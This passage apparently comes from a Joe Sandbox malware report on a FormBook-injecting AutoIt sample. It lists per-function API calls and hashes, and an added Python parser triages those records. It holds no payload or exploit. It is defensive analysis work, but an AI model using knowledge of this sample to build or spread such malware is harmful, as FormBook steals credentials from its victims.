                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                            • String ID:
                                                                                                            • API String ID: 3761583154-0
                                                                                                            • Opcode ID: 434ab9b46e42416c8a81575e74388d6d9c07e131c0b3cb281ab65f6e1ff66f4d
                                                                                                            • Instruction ID: e45170af0632a4299dbba1e6259ebc1a1ee6f489e6c41fe15c492e331c763ed7
                                                                                                            • Opcode Fuzzy Hash: 434ab9b46e42416c8a81575e74388d6d9c07e131c0b3cb281ab65f6e1ff66f4d
                                                                                                            • Instruction Fuzzy Hash: 4B21D375600204AFEB10AFBCCD88DBA77ECEB093607108025F955CB2A9DA78DC41CB74
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F6), ref: 010205C6
                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01020601
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHandlePipe
                                                                                                            • String ID: nul
                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                            • Opcode ID: 9e51155dcfdc4b220d6c0ef6a704bee9f058238131a24a50367285645aa7ac36
                                                                                                            • Instruction ID: f278eca44fc3b19ac8a3e391566578a5deb120ff713a81c6d59821a442cc63ab
                                                                                                            • Opcode Fuzzy Hash: 9e51155dcfdc4b220d6c0ef6a704bee9f058238131a24a50367285645aa7ac36
                                                                                                            • Instruction Fuzzy Hash: 2921B7755003259FEB309F6DC948A9AB7E8BF89724F300A59F9E1D72E8D7B19540CB10
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 010204F2
                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0102052E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateHandlePipe
                                                                                                            • String ID: nul
                                                                                                            • API String ID: 1424370930-2873401336
                                                                                                            • Opcode ID: 97e235d0a4ead5be97bac1447cfa1fd0c149858191ddce85ec865082bd051e48
                                                                                                            • Instruction ID: 498becabaaf189deb0e0af3163bc2a1cf922b1dad7de975c61cfcae5dfeefa8d
                                                                                                            • Opcode Fuzzy Hash: 97e235d0a4ead5be97bac1447cfa1fd0c149858191ddce85ec865082bd051e48
                                                                                                            • Instruction Fuzzy Hash: 3E21BFB4600329EFEB208F29D944A9BBBF4AF44720F204A58F9E1D72E8D7709540CB60
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB604C
                                                                                                              • Part of subcall function 00FB600E: GetStockObject.GDI32(00000011), ref: 00FB6060
                                                                                                              • Part of subcall function 00FB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB606A
                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01044112
                                                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0104411F
                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0104412A
                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01044139
                                                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01044145
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                                                            • String ID: Msctls_Progress32
                                                                                                            • API String ID: 1025951953-3636473452
                                                                                                            • Opcode ID: 8831fe2b7316dd7f6e6645f9fe543fd11f41fa11ffacec137addd7eef1b31406
                                                                                                            • Instruction ID: a145b7533c54ec7d5d7c9247f6e6ecfc236db080dc8adfe2ac8a27c918c4920b
                                                                                                            • Opcode Fuzzy Hash: 8831fe2b7316dd7f6e6645f9fe543fd11f41fa11ffacec137addd7eef1b31406
                                                                                                            • Instruction Fuzzy Hash: 5711B2B215021DBFFF219E65CC85EEB7F9DEF08798F018121BA58E6050C6769C21DBA4
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FED7A3: _free.LIBCMT ref: 00FED7CC
                                                                                                            • _free.LIBCMT ref: 00FED82D
                                                                                                              • Part of subcall function 00FE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000), ref: 00FE29DE
                                                                                                              • Part of subcall function 00FE29C8: GetLastError.KERNEL32(00000000,?,00FED7D1,00000000,00000000,00000000,00000000,?,00FED7F8,00000000,00000007,00000000,?,00FEDBF5,00000000,00000000), ref: 00FE29F0
                                                                                                            • _free.LIBCMT ref: 00FED838
                                                                                                            • _free.LIBCMT ref: 00FED843
                                                                                                            • _free.LIBCMT ref: 00FED897
                                                                                                            • _free.LIBCMT ref: 00FED8A2
                                                                                                            • _free.LIBCMT ref: 00FED8AD
                                                                                                            • _free.LIBCMT ref: 00FED8B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 776569668-0
                                                                                                            • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                            • Instruction ID: d6632e52926183d9b920c9900ebd21d0d8d55cbfbc91fd1fa1c4db14a1be4434
                                                                                                            • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                                                                                                            • Instruction Fuzzy Hash: 01115171540B88AAD521BFB2CC47FCB7BEC6F00700F400825B699A6893DA6DB5057651
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0101DA74
                                                                                                            • LoadStringW.USER32(00000000), ref: 0101DA7B
                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0101DA91
                                                                                                            • LoadStringW.USER32(00000000), ref: 0101DA98
                                                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0101DADC
                                                                                                            Strings
                                                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 0101DAB9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HandleLoadModuleString$Message
                                                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                                                            • API String ID: 4072794657-3128320259
                                                                                                            • Opcode ID: 4bad4bec1c95d3a89e666bc70d73ac6664d8b031c5721e537a106e6ee21eab7b
                                                                                                            • Instruction ID: e70fb2cef8cdf819356c3bb68330ce9cd91c5bd45bc73d132d7bb0cf352de3a4
                                                                                                            • Opcode Fuzzy Hash: 4bad4bec1c95d3a89e666bc70d73ac6664d8b031c5721e537a106e6ee21eab7b
                                                                                                            • Instruction Fuzzy Hash: 630162F69002087FF710DBE49FC9EEB376CE708205F404495B786E2045EA79AE844B74
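                                                                                                             The records above are per-function summaries from the Joe Sandbox IDA plugin: each lists the Windows APIs one function calls (captured arguments, "?" where the sandbox could not resolve a value, and the call-site address), calls attributed to a callee ("Part of subcall function"), referenced strings, the memory dump the code was lifted from, and similarity keys (API ID, String ID, Opcode ID, fuzzy hashes). The report flags the binary as a likely compiled AutoIt script, and these particular functions look like the interpreter's own housekeeping (COM string conversion via SysAllocString/StringFromGUID2, a Msctls_Progress32 progress-bar control, the "%s (%d) : ==> %s: %s %s" error message box) rather than the injected FormBook payload, so treat them as context for the injection and anti-analysis hits listed in the Overview, not as the payload itself. As an added example that is not part of this report or of Joe Sandbox, the Python below parses records of this shape into structured data and runs a small triage: it names the SendMessageW messages in the progress-bar record (WM_SETFONT, PBM_SETRANGE and friends are standard Windows constants) and flags direct calls to an analyst-chosen watchlist. The sample text is copied from records on this page and trimmed to the fields used; the record grammar is inferred from the page rather than from a published specification, and WATCHLIST and MSG_NAMES are this example's own assumptions.

```python
"""Added example (not Joe Sandbox code): parse the IDA-plugin function records
shown in this report and triage the API calls they list."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One API bullet.  Forms seen on the page (record grammar inferred, not documented):
#   CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01020601
#   _free.LIBCMT ref: 00FED82D
#   Part of subcall function 00FB600E: GetStockObject.GDI32(00000011), ref: 00FB6060
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}
# Standard Windows message numbers for the SendMessageW calls in the progress-bar record.
MSG_NAMES = {0x0030: "WM_SETFONT", 0x0401: "PBM_SETRANGE", 0x0402: "PBM_SETPOS",
             0x0404: "PBM_SETSTEP", 0x0409: "PBM_SETBARCOLOR", 0x2001: "PBM_SETBKCOLOR"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # raw argument text; "?" = not resolved by the sandbox
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # callee address for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)     # (string, xref address)
    associated: list = field(default_factory=list)  # associated memory-dump files
    meta: dict = field(default_factory=dict)        # API ID, String ID, Opcode ID, hashes, ...

    def direct_apis(self):
        return [c for c in self.apis if c.subcall_of is None]


def parse_records(text):
    """Split report text into FunctionRecords; every 'APIs' header starts a new one."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            rec = FunctionRecord()
            records.append(rec)
            section = line
            continue
        if line in SECTION_HEADERS:
            section = line
            continue
        if rec is None:
            continue                                  # text before the first record
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                sub = int(m["sub"], 16) if m["sub"] else None
                rec.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), sub))
        elif section == "Strings":                    # e.g. "%s (%d) ..., xrefs: 0101DAB9"
            s, sep, xref = body.rpartition(", xrefs: ")
            if sep:
                rec.strings.append((s, int(xref, 16)))
        else:                                         # "Key: value" metadata lines
            key, sep, value = body.partition(":")
            if not sep:
                continue
            value = value.strip().removesuffix("Download File")   # drop the page's link text
            if key == "Associated":
                rec.associated.append(value)
            else:
                rec.meta[key.strip()] = value
    return records


def decode_sendmessage(call):
    """Name the message of a SendMessageW call (args: hwnd, msg, wParam, lParam); else None."""
    if call.name != "SendMessageW" or len(call.args) < 2 or call.args[1] == "?":
        return None
    msg = int(call.args[1], 16)
    return MSG_NAMES.get(msg, f"0x{msg:X}")


def triage(records, watchlist):
    """Map each watchlisted API to the call sites where a record calls it directly."""
    hits = {}
    for rec in records:
        for call in rec.direct_apis():
            if call.name in watchlist:
                hits.setdefault(call.name, []).append(call.ref)
    return hits


def functions_using_string(records, needle):
    """Opcode IDs of records whose String ID or Strings section mention `needle`."""
    return [r.meta.get("Opcode ID", "?") for r in records
            if needle in r.meta.get("String ID", "") or any(needle in s for s, _ in r.strings)]


# Constructed sample: three records copied from this report, trimmed to the fields used.
SAMPLE = """
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 010204F2
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0102052E
Strings
Memory Dump Source
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CreateHandlePipe
• String ID: nul
• Opcode ID: 97e235d0a4ead5be97bac1447cfa1fd0c149858191ddce85ec865082bd051e48
APIs
  • Part of subcall function 00FB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB604C
  • Part of subcall function 00FB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB606A
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01044112
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01044139
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01044145
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• Opcode ID: 8831fe2b7316dd7f6e6645f9fe543fd11f41fa11ffacec137addd7eef1b31406
APIs
• EnterCriticalSection.KERNEL32(0117BA78,00000000), ref: 0102098D
• TerminateThread.KERNEL32(011724A8,000001F6), ref: 0102099B
• WaitForSingleObject.KERNEL32(011724A8,000003E8), ref: 010209A9
• CloseHandle.KERNEL32(011724A8), ref: 010209B8
"""
WATCHLIST = {"TerminateThread", "CreatePipe"}   # analyst's own choice; an assumption of this example
```

Running `triage(parse_records(SAMPLE), WATCHLIST)` returns the CreatePipe and TerminateThread call sites, and `decode_sendmessage` turns the five SendMessageW calls of the progress-bar record into WM_SETFONT, PBM_SETBKCOLOR, PBM_SETRANGE and PBM_SETSTEP, which is what an analyst needs to dismiss that function as GUI plumbing. Only direct calls are triaged on purpose: "Part of subcall function" lines are repeated under every caller of the callee, so counting them would inflate a single interesting call into many hits.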
                                                                                                            APIs
                                                                                                            • InterlockedExchange.KERNEL32(0117BA98,0117BA98), ref: 0102097B
                                                                                                            • EnterCriticalSection.KERNEL32(0117BA78,00000000), ref: 0102098D
                                                                                                            • TerminateThread.KERNEL32(011724A8,000001F6), ref: 0102099B
                                                                                                            • WaitForSingleObject.KERNEL32(011724A8,000003E8), ref: 010209A9
                                                                                                            • CloseHandle.KERNEL32(011724A8), ref: 010209B8
                                                                                                            • InterlockedExchange.KERNEL32(0117BA98,000001F6), ref: 010209C8
                                                                                                            • LeaveCriticalSection.KERNEL32(0117BA78), ref: 010209CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                            • String ID:
                                                                                                            • API String ID: 3495660284-0
                                                                                                            • Opcode ID: e63dd1efb1bcb47dff1a29c9cb463de81d1616b16e0ee74dbef4131b781ff3c7
                                                                                                            • Instruction ID: 19ecaa60ef02c6d75ebc86adce9c0f4603a59a151cdb87e7ffbb69a08a81a50f
                                                                                                            • Opcode Fuzzy Hash: e63dd1efb1bcb47dff1a29c9cb463de81d1616b16e0ee74dbef4131b781ff3c7
                                                                                                            • Instruction Fuzzy Hash: 76F01D71543A12BBF7615B94EFC8AD67A25BF05702F401015F24250898C7BA9465CF90
                                                                                                            APIs
                                                                                                            • GetClientRect.USER32(?,?), ref: 00FB5D30
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FB5D71
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00FB5D99
                                                                                                            • GetClientRect.USER32(?,?), ref: 00FB5ED7
                                                                                                            • GetWindowRect.USER32(?,?), ref: 00FB5EF8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$Client$Window$Screen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1296646539-0
                                                                                                            • Opcode ID: 185a1cbc7dafef6ca8e5a8c2efa35cfcc9d540cf5102014076cced287fb993f3
                                                                                                            • Instruction ID: a61f4db8e5ef0611802e10de6ee7052a5aa9b33c8682dea4ab61b376a9a1a522
                                                                                                            • Opcode Fuzzy Hash: 185a1cbc7dafef6ca8e5a8c2efa35cfcc9d540cf5102014076cced287fb993f3
                                                                                                            • Instruction Fuzzy Hash: 93B17839A0064ADBDB10CFA9C5807FAB7F1FF48310F14851AE8A9D7250DB38EA41EB54
                                                                                                            APIs
                                                                                                            • __allrem.LIBCMT ref: 00FE00BA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE00D6
                                                                                                            • __allrem.LIBCMT ref: 00FE00ED
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE010B
                                                                                                            • __allrem.LIBCMT ref: 00FE0122
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE0140
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                            • String ID:
                                                                                                            • API String ID: 1992179935-0
                                                                                                            • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction ID: 026ca594da2dcfc5d8aeb74fabaff42bb8d9d98c81d00ff72e2fe4ccdfb0df03
                                                                                                            • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                                                                            • Instruction Fuzzy Hash: 8481F872A007469BE7209F6ACC41B6B73E9AF41334F28463AF551DB3C1EBB8D944A750
                                                                                                            APIs
                                                                                                              • Part of subcall function 01033149: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,0103101C,00000000,?,?,00000000), ref: 01033195
                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01031DC0
                                                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01031DE1
                                                                                                            • WSAGetLastError.WSOCK32 ref: 01031DF2
                                                                                                            • inet_ntoa.WSOCK32(?), ref: 01031E8C
                                                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 01031EDB
                                                                                                            • _strlen.LIBCMT ref: 01031F35
                                                                                                              • Part of subcall function 010139E8: _strlen.LIBCMT ref: 010139F2
                                                                                                              • Part of subcall function 00FB6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,00FCCF58,?,?,?), ref: 00FB6DBA
                                                                                                              • Part of subcall function 00FB6D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00FCCF58,?,?,?), ref: 00FB6DED
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                                                            • String ID:
                                                                                                            • API String ID: 1923757996-0
                                                                                                            • Opcode ID: d5879adf7d8ba2677c33c94642827f9d08d9655f96518d4e5435b0920fa92d34
                                                                                                            • Instruction ID: 34d9d33825c85bf282a13c0a3d778b44c513832606a666ebd6a19247ea10bb58
                                                                                                            • Opcode Fuzzy Hash: d5879adf7d8ba2677c33c94642827f9d08d9655f96518d4e5435b0920fa92d34
                                                                                                            • Instruction Fuzzy Hash: 5CA1E130104301AFD324EF25C885F6A7BE9AFD8318F54898CF5965B2A2CB75ED46CB91
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FD82D9,00FD82D9,?,?,?,00FE644F,00000001,00000001,8BE85006), ref: 00FE6258
                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FE644F,00000001,00000001,8BE85006,?,?,?), ref: 00FE62DE
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FE63D8
                                                                                                            • __freea.LIBCMT ref: 00FE63E5
                                                                                                              • Part of subcall function 00FE3820: RtlAllocateHeap.NTDLL(00000000,?,01081444,?,00FCFDF5,?,?,00FBA976,00000010,01081440,00FB13FC,?,00FB13C6,?,00FB1129), ref: 00FE3852
                                                                                                            • __freea.LIBCMT ref: 00FE63EE
                                                                                                            • __freea.LIBCMT ref: 00FE6413
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1414292761-0
